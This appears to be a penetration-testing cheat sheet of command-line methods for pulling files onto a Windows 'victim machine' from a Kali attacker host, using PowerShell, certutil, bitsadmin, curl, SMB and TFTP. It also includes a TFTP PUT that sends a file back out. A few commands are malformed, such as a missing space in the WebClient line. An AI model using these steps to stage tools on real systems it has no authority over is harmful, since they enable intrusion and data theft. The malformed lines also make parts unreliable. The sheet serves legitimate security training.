# Windows File Transfers

> Methodologies for Windows File Transfer

### Using Powershell (Invoke-Web Request)

In Kali Machine:

```
sudo python -m SimpleHTTPServer 80
```

On Victim Machine:

```
powershell.exe -command iwr -Uri http://192.168.1.2/transfer.exe -OutFile "C:\Temp\transfer.exe"
```

Shortened Command:

```
powershell.exe iwr -uri 192.168.1.2/putty.exe -o C:\Temp\putty.exe
```

More Shorter:

Run the Powershell First:

```
powershell
```

Then,

```
iwr -uri 192.168.1.2/putty.exe -o C:\Temp\putty.exe
```

### Certutil

In Kali:

```
sudo python -m SimpleHTTPServer 80
```

Victim Machine:

```
certutil -urlcache -f http://192.168.1.2/putty.exe putty.exe
```
OR
```
certutil -urlcache -split -f http://192.168.1.2/putty.exe putty.exe
```

### Bitsadmin

Download Files from Internet:

Victim Machine:

```
bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1
```

### Curl

In Kali:

```
sudo python -m SimpleHTTPServer 80
```

Victim Machine:

```
curl http://192.168.1.2/putty.exe -o putty.exe
```

### Wget(Powershell)

```
powershell.exe wget http://192.168.1.2/putty.exe -OutFile putty.exe
```

### Powershell

```
powershell.exe (New-ObjectSystem.Net.WebClient).DownloadFile('http://192.168.1.2/putty.exe', 'putty.exe')
```

### SMB Server

On Kali Machine:

```
sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py ShareName SharePath
```

Victim Machine:

```
copy \\192.168.1.2\share\putty.exe
```

Also,

```
net use \\192.168.1.2\share
net use
copy \\192.168.1.2\share\putty.exe
```

### TFTP

**In Windows XP/Windows 2003**

By default, TFTP is installed and enabled in Windows XP

In Kali Machine, start and setup tftp server:

```
atftpd --daemon --port 69 /tftp
/etc/init.d/atftpd restart
```

Copy your respected file to /srv/tftp folder:

Check if it is running:

```
netstat -a -p UDP | grep udp
```

In Windows XP Machine:

```
tftp -i 10.10.14.10 GET transfer.exe
```

Vice-Versa

```
tftp -i 192.168.1.2 PUT file1.txt
```

If you want to make sure that the file was uploaded correct you can check in the syslog. Grep for the IP like this:

`grep 192.168.1.101 /var/log/syslog`